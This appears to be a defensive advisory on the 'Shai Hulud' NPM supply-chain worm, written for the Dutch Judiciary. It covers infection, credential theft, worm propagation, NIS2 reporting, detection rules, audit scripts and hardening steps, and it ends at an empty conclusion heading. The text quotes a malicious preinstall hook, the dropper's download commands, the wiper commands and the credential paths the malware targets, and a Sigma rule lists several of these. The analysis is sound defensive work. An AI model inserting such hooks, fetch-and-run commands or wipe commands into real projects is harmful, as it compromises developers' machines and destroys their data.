Containment analysis, and mitigation of the “Shai Hulud” supply chain malware campaign
1. Summary
This advisory constitutes an analysis of the “Shai Hulud” malware campaign, a sophisticated, self-replicating supply chain attack targeting the JavaScript/TypeScript (NPM) ecosystem. This threat poses a critical and active risk to the Dutch public sector’s Continuous Integration/Continuous Deployment (CI/CD) pipelines, particularly within the context of the Judiciary (Rechtspraak), given the extensive reliance on open-source dependencies for digital service delivery and the modernization of judicial applications.
The attack has evolved through two distinct phases: an initial wave in September 2025 targeting widely used libraries such as @ctrl/tinycolor and ngx-bootstrap, and a more aggressive “Second Coming” (v2) observed in late November 2025. This second variant leverages the Bun runtime for evasion, operates during the preinstall phase to maximize infection rates, and includes destructive “wiper” capabilities designed to destroy victim data upon detection or containment attempts. The malware operates as a worm, utilizing stolen NPM publisher tokens to automatically infect downstream dependencies, creating an exponential blast radius that threatens the integrity of the national software supply chain.
Key Findings & Strategic Risks:
- Active Threat Status: The campaign is active, adaptive, and evolving. The v2 variant executes during the preinstall phase of package installation. This means infection occurs immediately upon dependency resolution, prior to any build steps, testing, or static analysis that might occur later in the pipeline [1].
- Destructive Capability (“Dead Man’s Switch”): Analysis confirms a “dead man’s switch.” If the malware fails to authenticate with external command-and-control (C2) or exfiltration endpoints (GitHub/NPM), it executes a destructive payload designed to wipe the user’s home directory ($HOME or %USERPROFILE%). This poses a severe risk to developer workstations and build agents, potentially resulting in catastrophic data loss for unbacked-up local environments [3].
- Data Exfiltration: The malware aggressively harvests cloud credentials (AWS, Azure, GCP), source code control tokens (GitHub PATs), and registry credentials (NPM tokens). It utilizes an embedded version of the legitimate security tool TruffleHog to scan the filesystem for high-entropy secrets, effectively weaponizing defensive tooling against the victim [5].
- Sovereignty & Compliance Violation: The exfiltration mechanism publishes stolen data to public GitHub repositories. For the Dutch public sector, this constitutes a significant data breach under the General Data Protection Regulation (AVG) and a “significant incident” under the NIS2 Directive (implemented via the Cyberbeveiligingswet), necessitating immediate reporting to the CSIRT-DSP and NCSC-NL due to the potential compromise of state secrets and citizen data [7].
- Persistence: The malware establishes persistence by registering infected build agents as self-hosted GitHub Actions runners (often named SHA1HULUD), granting attackers remote code execution capabilities within the internal network, bypassing traditional perimeter firewalls [9].
Immediate Recommendations (BLUF):
- Block Egress: Immediately block outbound traffic to webhook.site, *.github.io (specifically suspicious subdomains), and restrict egress from CI/CD runners to a strict allow-list.
- Audit Dependencies: Scan all package-lock.json and yarn.lock files for the presence of @ctrl/tinycolor (versions 4.1.1/4.1.2), ngx-bootstrap, and other indicators of compromise (IoCs) listed in this report.
- Containment Protocol: Isolate any machine showing signs of setup_bun.js or bun_environment.js execution. Do not simply disconnect network cables on developer workstations without preparation, as this may trigger the wiper mechanism; suspend the process or VM state first to freeze execution.
- Credential Rotation: Assume compromise of all NPM tokens and GitHub Personal Access Tokens (PATs) present on infected machines. Rotate all cloud credentials exposed to CI environments immediately.
2. Technical Anatomy of the Attack
The “Shai Hulud” campaign represents a paradigm shift in NPM supply chain attacks, moving from simple credential theft (like the event-stream incident) to automated, worm-like propagation with destructive failsafes. The analysis below dissects the kill chain of the v2 variant (“The Second Coming”), which poses the highest current threat to the Judiciary’s infrastructure.
2.1. Infection Vector: The “Preinstall” Shift
Unlike the v1 variant, which relied on postinstall scripts, the v2 variant executes during the preinstall lifecycle phase. This is a critical tactical evolution. The preinstall script runs immediately when npm install is executed, often before vulnerability scanners or Software Composition Analysis (SCA) tools have completed their assessment of the dependency tree. This ensures the malware runs even if the installation ultimately fails or is cancelled by the user [1].
The infection begins with a compromised dependency (e.g., a trojanized version of @asyncapi/specs, @ctrl/tinycolor, or posthog-node) containing a modified package.json:
```json
{
  "scripts": {
    "preinstall": "node setup_bun.js"
  }
}
```
This triggers the execution of the dropper script, setup_bun.js, which initiates the malware’s bootstrap process. The choice of preinstall is deliberate; it catches developers and CI systems off-guard, executing code the moment they attempt to consume the package.
2.2. The Dropper: setup_bun.js and Bun Runtime Evasion
The attackers have chosen to utilize the Bun runtime environment rather than standard Node.js for the execution of the main payload. This serves as a potent evasion technique. Many Endpoint Detection and Response (EDR) and container security tools are tuned to monitor node, npm, or python processes for suspicious child processes or network connections. However, bun is a newer, faster runtime that may not be on the radar of legacy security monitoring rules, or may be whitelisted as a developer tool [11].
Mechanism of setup_bun.js:
- Environment Check: The script first checks if the bun binary is already present in the system’s PATH or in standard installation directories.
- Silent Installation: If absent, it downloads and installs bun directly from the official domain bun.sh via curl (on Unix-like systems) or powershell (on Windows).
  - Linux/macOS Command: The script executes a command similar to execSync('curl -fsSL https://bun.sh/install | bash', { stdio: 'ignore' }); to fetch the installer and pipe it to bash.
  - Windows Command: It uses PowerShell: execSync('powershell -c "irm bun.sh/install.ps1|iex"', { stdio: 'ignore' });.
- Path Manipulation: It dynamically updates the process’s environment path to include the newly installed Bun binary, ensuring it can be called immediately without a system restart.
- Payload Execution: Once the runtime is available, it executes the core malicious payload, bun_environment.js. Crucially, it often launches this as a detached background process. This allows the legitimate npm install process to continue and appear to complete successfully, masking the infection from the developer who sees a “success” message in their terminal [10].
2.3. The Core Payload: bun_environment.js
The bun_environment.js file is a large (~10MB), heavily obfuscated JavaScript file containing the malware’s primary logic. It functions as a modular attack framework with distinct capabilities for reconnaissance, harvesting, exfiltration, and destruction. The size and obfuscation are designed to hinder static analysis and reverse engineering [13].
2.3.1. Credential Harvesting & “TruffleHog” Abuse
The malware creates a directory structure (often hidden, such as .truffler-cache) and downloads a standalone binary of TruffleHog, a legitimate open-source security tool used for finding secrets. By weaponizing a legitimate security tool, the attackers ensure high-fidelity secret detection while potentially blending in with legitimate DevSecOps activities, a “Living off the Land” (LotL) tactic [5].
Targeted Credentials:
- Cloud Providers: The malware scans standard configuration paths (~/.aws/credentials, ~/.azure/, ~/.config/gcloud/) and specific environment variables (e.g., AWS_ACCESS_KEY_ID, AZURE_CLIENT_SECRET) for AWS Access Keys, Azure Service Principal secrets, and GCP Service Account keys. It parses these files to extract cleartext credentials [15].
- Development Tools: It specifically hunts for tokens related to the software supply chain: NPM_TOKEN, GITHUB_TOKEN, GH_TOKEN, and private SSH keys (id_rsa, id_ed25519) used for repository access [5].
- Filesystem Scan: It executes the embedded TruffleHog binary with arguments to scan the entire filesystem (or specific user directories like $HOME) for high-entropy strings that match patterns for API keys, database passwords, and other secrets. The results are output to a JSON file (e.g., truffleSecrets.json) for exfiltration [6].
2.3.2. Worm Propagation Mechanism
This is the defining characteristic of “Shai Hulud.” The malware checks for a valid NPM publishing token in the victim’s .npmrc file or environment variables. If a write-access token is found:
- Authentication: It authenticates to the NPM registry as the victim user [10].
- Enumeration: It queries the registry to list all packages maintained by the compromised user.
- Infection: It downloads the latest version of these packages to a temporary directory. It then injects the setup_bun.js and bun_environment.js files into the package structure and modifies package.json to include the malicious preinstall script pointing to the dropper.
- Republication: It bumps the package version (typically incrementing the patch level, e.g., 1.0.1 to 1.0.2) to ensure the new malicious version is picked up by users with semver-compatible dependencies (e.g., ^1.0.0). Finally, it publishes the infected package back to the NPM registry [5].
This automated self-replication allows the malware to move laterally from a single compromised developer workstation to potentially hundreds of trusted libraries within minutes. In the initial waves, this mechanism was responsible for infecting over 500 packages [5].
2.3.3. Persistence via GitHub Actions
To maintain access even if the infected package is removed from the registry or the developer cleans their machine, the malware establishes persistence within the victim’s GitHub repositories:
- Self-Hosted Runners: It uses stolen GitHub tokens to register the infected machine as a self-hosted GitHub Actions runner. These runners are often named SHA1HULUD or use a random 18-character string [4]. This effectively turns the compromised server into a botnet node controlled by the attacker, allowing them to execute arbitrary jobs on the machine at any time.
- Malicious Workflows: It commits malicious workflow files (e.g., .github/workflows/discussion.yaml or shai-hulud-workflow.yml) to the victim’s repositories. These workflows are configured to trigger on common events (like creating a discussion) or on a schedule. When triggered, they execute commands to exfiltrate secrets, run crypto-miners, or reinfect the environment [9].
2.4. Destructive Capability: The “Dead Man’s Switch”
Perhaps the most critical finding for incident responders is the malware’s destructive fallback mechanism. Code analysis reveals a conditional logic block that functions as a wiper. This capability transforms the threat from purely espionage to potential sabotage.
Trigger Conditions:
The wiper is triggered if the malware cannot authenticate to GitHub (preventing data exfiltration) AND cannot find a valid NPM token (preventing propagation) [4]. This behavior suggests a “scorched earth” policy: if the malware determines it has been cornered, analyzed in a sandbox without internet access, or if the victim has revoked credentials but not removed the active malware process, it destroys evidence and inflicts damage.
Destructive Logic:
- Linux/macOS: It executes the command shred -uvz -n 1 on files in the home directory. shred overwrites files with random data to prevent forensic recovery before deleting them. It follows this with find "$HOME" -depth -type d -empty -delete to recursively remove empty directories, effectively wiping the user’s profile [3].
- Windows: It utilizes del /F /Q /S "%USERPROFILE%*" to force-delete files and cipher /W:%USERPROFILE% to overwrite free space, making recovery difficult [3].
Operational Implication: This creates a significant risk during containment. Simply severing the network connection of an active infection before suspending the process could trigger this wiper logic, as the malware will interpret the loss of connectivity to GitHub/NPM as a trigger condition.
3. Impact Assessment (Dutch Public Sector Context)
The threat profile for the Dutch Judiciary (Rechtspraak) and the broader public sector is categorized as CRITICAL. The heavy reliance on modern JavaScript frameworks (Angular, React, Vue) and the NPM ecosystem for digital services (e.g., Mijn Rechtspraak, digital filing systems, case management interfaces) creates a broad and fertile attack surface for this campaign.
3.1. Likelihood of Exposure
The likelihood of exposure is High.
- Targeted Libraries: The infection of @ctrl/tinycolor (2M+ weekly downloads) and ngx-bootstrap (widely used in Angular applications, which are common in enterprise environments like the Judiciary) means that any CI/CD pipeline pulling the “latest” version of these dependencies during the infection window was likely compromised [5].
- Transitive Dependencies: Even if these libraries are not direct dependencies of Rechtspraak applications, they are often deeply nested transitively (dependencies of dependencies). Tools like npm audit may not catch the malicious version immediately if the vulnerability database is not updated in real-time, or if the malicious package mimics a legitimate update.
- Public vs. Private Registries: Organizations using direct connections to registry.npmjs.org are at immediate risk. Those using caching proxies (Artifactory/Nexus) are still at risk if the proxy updated its cache during the infection window. Unless strict “quarantine” policies are in place, the proxy would simply cache and serve the malicious artifact [20].
3.2. Data Exfiltration Risks
The specific risk to the Judiciary involves the exfiltration of high-sensitivity technical secrets, which can lead to secondary compromises and lateral movement:
- Cloud Keys: Exfiltration of AWS Access Keys or Azure Service Principal credentials allows attackers to access cloud storage buckets (S3, Blob Storage) potentially containing sensitive case data, Personally Identifiable Information (PII) of citizens, or system backups [10].
- Source Code Access: Stolen GitHub Personal Access Tokens (PATs) grant attackers read/write access to private repositories. This exposes intellectual property, the internal logic of judicial systems, and potentially hardcoded secrets within the code [5]. Access to source code facilitates the discovery of further vulnerabilities.
- Infrastructure-as-Code (IaC): Access to Terraform or Kubernetes configurations via stolen secrets can allow attackers to map the internal network, understand the security architecture, and deploy backdoors at the infrastructure level (e.g., modifying a Terraform plan to open a security group).
3.3. “Wormable” Propagation within Internal Registries
A unique and dangerous vector is the potential for the worm to infect private/internal packages. If a developer with write access to the organization’s private NPM registry (e.g., an internal Artifactory instance hosted within the Rechtspraak network) is infected, the malware will attempt to publish infected versions of internal packages [15].
This would effectively poison the internal supply chain. The malware would then spread to every other internal project that consumes these private libraries, bypassing perimeter defenses and moving laterally across development teams. This “insider threat” mechanic turns trusted developers into unwitting vectors of infection.
4. NIS2 Compliance & Regulatory Impact
Under the NIS2 Directive (EU 2022/2555), transposed into Dutch law via the Cyberbeveiligingswet, the Judiciary and associated digital service providers are classified as essential or important entities. This classification imposes strict legal obligations regarding supply chain security and incident reporting.
4.1. “Significant Incident” Determination
A successful infection by Shai Hulud constitutes a “significant incident” under NIS2 and the Wbni (Wet beveiliging netwerk- en informatiesystemen) based on the following criteria:
- Severe Operational Disruption: The potential for the wiper payload to destroy developer machines and build agents represents a severe disruption to the software supply chain and maintenance capabilities. If widespread, this could halt the ability to release critical security patches for judicial applications [21].
- Confidentiality Breach: The exfiltration of credentials and potential access to private repositories constitutes a breach of confidentiality that can affect the security of network and information systems. The theft of cloud keys could lead to unauthorized access to sensitive citizen data [7].
- Cross-Border Impact: Since the malware publishes stolen secrets to public GitHub repositories and potentially infects packages used globally (if the organization publishes open source software), the incident has an inherent cross-border dimension [23].
4.2. Reporting Obligations (NCSC-NL & CSIRT-DSP)
Upon detection of a Shai Hulud infection, the organization is legally obligated to adhere to the strict reporting timelines mandated by NIS2 [8]:
- Early Warning (24 Hours): An early warning must be submitted to the NCSC-NL (National Cyber Security Centre) and/or the CSIRT-DSP (for digital service providers) within 24 hours of becoming aware of the significant incident. This report must indicate whether the incident is suspected to be caused by unlawful or malicious action (which, in this case, is affirmative).
- Incident Notification (72 Hours): A detailed incident notification must be submitted within 72 hours. This must include an initial assessment of the severity, impact, and indicators of compromise (IoCs).
- Final Report (1 Month): A comprehensive final report must be submitted no later than one month after the incident notification. This report must detail the root cause, applied mitigation measures, and cross-border impact analysis.
4.3. BIO v1.2 Alignment (Baseline Informatiebeveiliging Overheid)
The incident highlights critical gaps in compliance with BIO v1.2 controls regarding software development and supply chain security [25]. The BIO is the mandatory baseline for Dutch government information security.
- Control 14.2.5 (Secure System Engineering): This control requires that principles for secure system engineering be established, documented, maintained, and applied to any information system implementation efforts. Reliance on unpinned, unverified public dependencies without integrity checks violates the spirit of this control.
- Control 14.2.1 (Secure Development Policy): Mandates rules for the development of software and systems. The “preinstall” execution vector specifically circumvents standard integrity checks that should be part of a secure development policy.
- Control 15.1.1 (Information Security Policy for Supplier Relationships): Requires information security requirements for mitigating the risks associated with supplier’s access to the organization’s assets. In this context, the “supplier” is the open-source maintainer. The implicit trust placed in these maintainers without verification represents a failure of this control.
5. Detection & Threat Hunting Strategy
To detect active or past infections, the SOC must execute a coordinated threat hunting campaign across endpoints (developer workstations) and CI/CD infrastructure. The following strategies leverage the indicators identified in the technical analysis.
5.1. Log & Network Analysis Queries
Query 1: Outbound Traffic to Exfiltration Domains
The malware exfiltrates data to specific endpoints. Block and alert on traffic to the following domains. Note that webhook.site is a legitimate service often used for testing, but its presence in CI logs is highly suspicious.
- webhook.site (Commonly used by v1/v2 for exfiltration) [17].
- *.github.io (Used for staging payloads or hosting configuration files).
- bun.sh (If bun is not a standard approved tool in the environment, download attempts here are a high-fidelity indicator) [13].
Query 2: Suspicious Process Execution (EDR/Sigma)
Look for the execution of the installation script, the dynamic installation of Bun, or the hidden TruffleHog binary [3].
Sigma logic for detection (conceptual):
```yaml
title: Shai Hulud dropper, TruffleHog abuse or wiper command line (conceptual)
logsource:
  category: process_creation
detection:
  selection_dropper:
    CommandLine|contains:
      - 'node setup_bun.js'
      - 'curl -fsSL https://bun.sh/install'
      - 'irm bun.sh/install.ps1'
  selection_trufflehog:
    CommandLine|contains:
      - 'trufflehog filesystem'
      - 'trufflehog --json'
      - 'trufflehog filesystem /'
  selection_wiper:
    CommandLine|contains:
      - 'shred -uvz'
      - 'cipher /W:%USERPROFILE%'
  condition: selection_dropper or selection_trufflehog or selection_wiper
level: critical
```
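To show how the conceptual rule above behaves on real telemetry, here is an added example (not from the advisory or any vendor) that encodes the three selections as a matcher and runs it over constructed process-creation events. The extra check for bun being spawned by node or npm is this example's own heuristic, drawn from section 2.2, and the field names (Image, ParentImage, CommandLine) follow the Sysmon-style naming Sigma uses.

```javascript
// Added example, not from the advisory: the conceptual Sigma logic above,
// expressed as a matcher and run over constructed process-creation events.

// The three Sigma selections, copied from the rule above.
const SELECTIONS = {
  selection_dropper: [
    'node setup_bun.js',
    'curl -fsSL https://bun.sh/install',
    'irm bun.sh/install.ps1',
  ],
  selection_trufflehog: [
    'trufflehog filesystem',
    'trufflehog --json',
    'trufflehog filesystem /',
  ],
  selection_wiper: [
    'shred -uvz',
    'cipher /W:%USERPROFILE%',
  ],
};

// Sigma's "|contains" is a case-insensitive substring test on the common
// backends; the same semantics are assumed here.
function contains(haystack, needle) {
  return String(haystack || '').toLowerCase().includes(needle.toLowerCase());
}

// Returns the names of every selection a single event satisfies.
function matchSelections(event) {
  const hits = Object.entries(SELECTIONS)
    .filter(([, needles]) => needles.some((n) => contains(event.CommandLine, n)))
    .map(([name]) => name);
  // Extra heuristic (an assumption of this example, not part of the rule above):
  // section 2.2 describes node/npm spawning the bun runtime, which is worth an
  // alert wherever bun is not an approved developer tool.
  const image = String(event.Image || '').toLowerCase();
  const parent = String(event.ParentImage || '').toLowerCase();
  if (/(^|[\\/])bun(\.exe)?$/.test(image) && /(^|[\\/])(node|npm)(\.exe)?$/.test(parent)) {
    hits.push('selection_bun_spawned_by_node');
  }
  return hits;
}

// condition: selection_dropper or selection_trufflehog or selection_wiper
// (plus the extra heuristic). Returns only the events that alert, each
// annotated with the selections it matched.
function evaluate(events) {
  return events.flatMap((e) => {
    const matched = matchSelections(e);
    return matched.length ? [{ ...e, matched }] : [];
  });
}

// Constructed sample telemetry (not real logs): four events a Shai Hulud
// infection would produce, one bun launch, and one benign node invocation.
const SAMPLE_EVENTS = [
  { Image: '/usr/bin/node', ParentImage: '/usr/bin/npm', CommandLine: 'node setup_bun.js' },
  { Image: '/bin/bash', ParentImage: '/usr/bin/node', CommandLine: 'bash -c "curl -fsSL https://bun.sh/install | bash"' },
  { Image: '/home/dev/.bun/bin/bun', ParentImage: '/usr/bin/node', CommandLine: 'bun bun_environment.js' },
  { Image: '/home/dev/.truffler-cache/trufflehog', ParentImage: '/home/dev/.bun/bin/bun', CommandLine: 'trufflehog filesystem / --json' },
  { Image: '/usr/bin/shred', ParentImage: '/bin/sh', CommandLine: 'shred -uvz -n 1 /home/dev/notes.txt' },
  { Image: '/usr/bin/node', ParentImage: '/usr/bin/npm', CommandLine: 'node node_modules/.bin/eslint .' },
];

const ALERTS = evaluate(SAMPLE_EVENTS);
console.log(JSON.stringify(ALERTS, null, 2));
```

Five of the six constructed events alert; only the eslint run passes, which is the false-positive budget a SOC should expect from these string matches on developer machines where bun is already approved.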
Query 3: GitHub Actions Anomaly Detection
Scan GitHub audit logs for specific anomalies related to the persistence mechanism:
- Runner Registration: Registration of new self-hosted runners with names containing SHA1HULUD or random 18-character strings [9].
- Repository Creation: Creation of public repositories with descriptions matching “Shai-Hulud” or “Sha1-Hulud: The Second Coming” [10].
- Workflow Modification: Workflows created/modified with filenames like discussion.yaml, shai-hulud-workflow.yml, or formatter_123456789.yml [30].
5.2. File System Indicators (IoCs)
Presence of any of the following files on a developer machine or build agent indicates a compromise:
- Dropper: setup_bun.js [20].
- Payload: bun_environment.js [2].
- Staging Files: truffleSecrets.json, cloud.json, environment.json, contents.json (Exfiltration staging files often found in temp directories or workspace roots) [2].
- Hidden Directory: A hidden .bun directory in the user’s home folder (if Bun is not authorized or installed by the user) [18].
5.3. Identifying “Trojanized” Internal Packages
To determine if internal packages (@rechtspraak/*) have been compromised and republished to the internal registry:
- Audit Registry Logs: Check internal registry (Artifactory/Nexus) logs for package publication events (npm publish) originating from IP addresses associated with compromised developer machines or occurring at anomalous times (e.g., late at night).
- Compare Checksums: Compare the checksums (shasum) of internal packages in the registry against the known good builds generated by the CI/CD system. Any discrepancy indicates tampering.
- Scan for Scripts: Download the tarballs of recently published internal packages and scan package.json for the presence of preinstall scripts executing setup_bun.js. Legitimate internal packages should rarely, if ever, require such scripts for deployment.
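As an added example (not the advisory's or any vendor's tooling) tying together the preinstall vector of section 2.1, the file IoCs of section 5.2 and the tarball check of section 5.3, the following script audits a lockfile and extracted package manifests for those indicators. The lockfile, manifests and file listings are constructed sample inputs, and the compromised-version table holds only the versions this report names.

```javascript
// Added example, not from the advisory: audit a package-lock.json and extracted
// package tarballs for the indicators listed in sections 2.1, 5.2 and 5.3.
// All inputs below are constructed in memory so the script runs offline; in
// practice pass the parsed lockfile and each tarball's package.json + file list.

// Compromised versions the advisory names; extend from vendor advisories.
const COMPROMISED_VERSIONS = {
  '@ctrl/tinycolor': new Set(['4.1.1', '4.1.2']),
};
// Dropper, payload and exfiltration staging file names from section 5.2.
const IOC_FILENAMES = new Set([
  'setup_bun.js', 'bun_environment.js', 'truffleSecrets.json',
  'cloud.json', 'environment.json', 'contents.json',
]);
// npm lifecycle hooks that run automatically during installation.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
// Fragments of the dropper invocation and the Bun installer fetch (section 2.2).
const HOOK_PATTERNS = [/setup_bun\.js/i, /bun_environment\.js/i, /bun\.sh\/install/i];

// Lockfile (v2/v3) entries are keyed by install path; the package name is the
// segment after the last "node_modules/", which also handles nested copies.
function packageNameFromPath(lockPath) {
  const marker = 'node_modules/';
  const i = lockPath.lastIndexOf(marker);
  return i < 0 ? lockPath : lockPath.slice(i + marker.length);
}

// Flag every lockfile entry whose resolved version is known-compromised.
function auditLockfile(lockfile) {
  const findings = [];
  for (const [lockPath, entry] of Object.entries(lockfile.packages || {})) {
    if (lockPath === '') continue; // the root project itself
    const name = packageNameFromPath(lockPath);
    const bad = COMPROMISED_VERSIONS[name];
    if (bad && bad.has(entry.version)) {
      findings.push({ kind: 'compromised-version', path: lockPath, name, version: entry.version });
    }
  }
  return findings;
}

// Inspect one extracted package: its package.json object and the file names
// found in its root directory.
function auditPackage(label, manifest, rootFiles) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (cmd && HOOK_PATTERNS.some((re) => re.test(cmd))) {
      findings.push({ kind: 'malicious-install-hook', label, hook, command: cmd });
    }
  }
  for (const file of rootFiles) {
    if (IOC_FILENAMES.has(file)) findings.push({ kind: 'ioc-file', label, file });
  }
  return findings;
}

// Constructed sample inputs (not real artifacts). The nested tinycolor copy is
// an older, unaffected version and must not be flagged.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'case-portal', version: '1.0.0' },
    'node_modules/@ctrl/tinycolor': { version: '4.1.2' },
    'node_modules/some-lib': { version: '2.3.0' },
    'node_modules/some-lib/node_modules/@ctrl/tinycolor': { version: '4.0.0' },
  },
};
// A clean internal package and the same package after worm republication
// (patch version bumped, preinstall hook added, dropper and payload dropped in).
const CLEAN_MANIFEST = { name: '@rechtspraak/ui-kit', version: '3.4.1', scripts: { build: 'tsc -p .' } };
const TROJANIZED_MANIFEST = {
  name: '@rechtspraak/ui-kit', version: '3.4.2',
  scripts: { build: 'tsc -p .', preinstall: 'node setup_bun.js' },
};
const CLEAN_FILES = ['package.json', 'dist', 'README.md'];
const TROJANIZED_FILES = ['package.json', 'dist', 'README.md', 'setup_bun.js', 'bun_environment.js'];

function runAudit() {
  return [
    ...auditLockfile(SAMPLE_LOCKFILE),
    ...auditPackage('@rechtspraak/ui-kit@3.4.1', CLEAN_MANIFEST, CLEAN_FILES),
    ...auditPackage('@rechtspraak/ui-kit@3.4.2', TROJANIZED_MANIFEST, TROJANIZED_FILES),
  ];
}

console.log(JSON.stringify(runAudit(), null, 2));
```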
6. Mitigation & Hardening Roadmap
This section outlines the immediate steps to sanitize the environment and the strategic measures to harden the supply chain against future wormable attacks.
6.1. Immediate Containment (The “Anti-Wiper” Protocol)
CRITICAL WARNING: Due to the “dead man’s switch” (wiper), simply disconnecting a machine from the internet may trigger the destructive payload if the malware is active and detects the loss of connectivity to GitHub/NPM.
- Suspend, Don’t Kill: If a machine is suspected of active infection, use EDR capabilities to suspend all node, bun, and powershell processes immediately rather than killing them or severing the network connection abruptly. Suspending the process freezes the execution state, preventing the wiper logic from running.
- Forensic Snapshot: Once suspended, take a memory and disk snapshot for forensic analysis and potential data recovery. This preserves evidence for NIS2 reporting.
- Isolation: After processes are suspended, isolate the machine from the network (VLAN quarantine).
- Sanitization: Reimaging is the only safe remediation. Do not attempt to “clean” the malware. The malware establishes multiple persistence mechanisms and potentially modifies other files. Rebuild developer workstations and CI runners from known-good, immutable images [13].
6.2. Short-Term Remediation (24-48 Hours)
- Credential Revocation & Rotation:
  - NPM Tokens: Revoke all Granular and Classic NPM tokens immediately. Implement a policy of “least privilege” for new tokens [2].
  - GitHub PATs: Revoke all PATs. Check for unauthorized SSH keys added to GitHub accounts.
  - Cloud Keys: Rotate all AWS Access Keys, Azure Service Principals, and GCP Service Account keys exposed to CI/CD environments or found on infected developer machines.
- Dependency Pinning:
  - Enforce the use of npm ci instead of npm install in all CI/CD pipelines. npm ci strictly installs versions from package-lock.json and prevents the silent installation of newer, potentially malicious versions [32].
  - Run npm audit across all repositories and purge local and CI caches: npm cache clean --force [2].
- Repository Cleanup:
  - Scan all repositories for malicious workflow files (e.g., .github/workflows/discussion.yaml).
  - Check for and remove unauthorized self-hosted runners in GitHub Organization settings.
6.3. Strategic Hardening (Sovereign & Resilient Architecture)
To align with the “Data Platform as Product” and “Sovereign Cloud” goals found in the workspace research, the following architectural changes are recommended to prevent future recurrence.
6.3.1. Isolate Build Environments & Private Registries
- Strict Upstream Proxy: Configure Artifactory/Nexus to block direct access to npmjs.org for all developers and build agents. All packages must be proxied through the internal registry.
- Quarantine Policy: Implement a “quarantine” policy where new package versions are held for 24-48 hours before being made available to developers. This allows time for community security reports to emerge and for vulnerability databases to update, reducing the risk of Zero-Day supply chain attacks [33].
- Scoped Registries: Configure .npmrc to strictly define scopes. Ensure internal packages (@rechtspraak/*) can only be pulled from the private registry, preventing “Dependency Confusion” attacks where attackers register internal package names on the public registry.
6.3.2. Implement OIDC for Publishing
Eliminate long-lived NPM tokens entirely. Adopt OpenID Connect (OIDC) for trusted publishing.
- Configure GitHub Actions to authenticate with the NPM registry using OIDC tokens. These tokens are short-lived, ephemeral, and bound to the specific workflow run. This renders stolen tokens useless outside the specific CI context, neutralizing the “worm” propagation vector [31].
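The following is an added example (not the advisory's code) that checks a project's .npmrc against the scoped-registry rule of 6.3.1 and the no-long-lived-token rule of 6.3.2, comparing a weak file with its hardened counterpart. The internal registry host names and the ignore-scripts check are this example's own assumptions; ignore-scripts is a standard npm setting that the advisory does not itself list but that directly disables the preinstall vector of section 2.1.

```javascript
// Added example, not from the advisory: lint a project .npmrc against the
// scoped-registry and no-long-lived-token policy of section 6.3. The two
// internal registry URLs are placeholders for the organisation's real proxy.
const PROXY_REGISTRY = 'https://npm.internal.example/artifactory/api/npm/npm-remote/';   // assumed
const PRIVATE_REGISTRY = 'https://npm.internal.example/artifactory/api/npm/npm-private/'; // assumed
const INTERNAL_SCOPES = ['@rechtspraak'];
const NPM_DEFAULT_REGISTRY = 'https://registry.npmjs.org/'; // what npm uses when unset

// .npmrc is an ini-style key=value file; comments start with # or ;.
function parseNpmrc(text) {
  const cfg = {};
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith('#') || line.startsWith(';')) continue;
    const eq = line.indexOf('=');
    if (eq < 0) continue;
    cfg[line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return cfg;
}

// Returns a list of policy violations; an empty list means the file complies.
function checkNpmrc(text) {
  const cfg = parseNpmrc(text);
  const problems = [];
  // 6.3.1: every install goes through the internal proxy, never npmjs.org directly.
  const registry = cfg.registry || NPM_DEFAULT_REGISTRY;
  if (registry !== PROXY_REGISTRY) {
    problems.push(`default registry is ${registry}; all installs must go through the internal proxy`);
  }
  // 6.3.1: internal scopes are pinned to the private registry (dependency confusion).
  for (const scope of INTERNAL_SCOPES) {
    const r = cfg[`${scope}:registry`];
    if (r !== PRIVATE_REGISTRY) {
      problems.push(`${scope} is not pinned to the private registry (got ${r || 'unset'})`);
    }
  }
  // 6.3.2: no literal long-lived token in a committed file. An ${ENV_VAR}
  // reference resolved at runtime is tolerated; OIDC needs no token at all.
  for (const [key, value] of Object.entries(cfg)) {
    if (key === '_authToken' || key.endsWith(':_authToken')) {
      if (!/^\$\{[A-Za-z_][A-Za-z0-9_]*\}$/.test(value)) {
        problems.push(`${key} holds a literal token; use OIDC trusted publishing or an environment reference`);
      }
    }
  }
  // Assumption of this example, not in the advisory: with ignore-scripts=true npm
  // runs no dependency lifecycle hooks, which removes the preinstall vector.
  if (cfg['ignore-scripts'] !== 'true') {
    problems.push('ignore-scripts is not enabled; preinstall hooks in dependencies will execute');
  }
  return problems;
}

// Constructed weak configuration: public registry, unscoped internal packages,
// a committed token (placeholder value), lifecycle scripts allowed.
const WEAK_NPMRC = [
  'registry=https://registry.npmjs.org/',
  '//registry.npmjs.org/:_authToken=npm_EXAMPLE_PLACEHOLDER_TOKEN',
].join('\n');

// Constructed hardened configuration for the same project.
const HARDENED_NPMRC = [
  '# everything via the proxy; the internal scope only from the private repository',
  `registry=${PROXY_REGISTRY}`,
  `@rechtspraak:registry=${PRIVATE_REGISTRY}`,
  '//npm.internal.example/artifactory/api/npm/npm-private/:_authToken=${NPM_CI_TOKEN}',
  'ignore-scripts=true',
].join('\n');

console.log('weak:', checkNpmrc(WEAK_NPMRC));
console.log('hardened:', checkNpmrc(HARDENED_NPMRC));
```

Note that ignore-scripts=true also silences hooks your own project legitimately needs (native builds, for instance), so apply it first on CI runners and allow-list exceptions deliberately.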
6.3.3. Harden CI/CD Runners
- Ephemeral Runners: Move to ephemeral (stateless) build agents that are destroyed after every job. This prevents the malware from establishing persistence or using the runner as a long-term beachhead [35].
- Network Segmentation: Restrict outbound internet access for CI runners. Whitelist only necessary domains (e.g., registry.npmjs.org (proxied), github.com). Explicitly block unknown Top-Level Domains (TLDs) and dynamic DNS domains like webhook.site [26].
6.3.4. Software Bill of Materials (SBOM) Enforcement
Implement automated SBOM generation (using tools like Syft or CycloneDX) for every build. Ingest these SBOMs into a dependency track system (e.g., OWASP Dependency-Track) to continuously monitor for the introduction of malicious packages like @ctrl/tinycolor across the entire application portfolio. This provides visibility into “phantom dependencies” that may not appear in the root package.json [36].
7. Conclusion
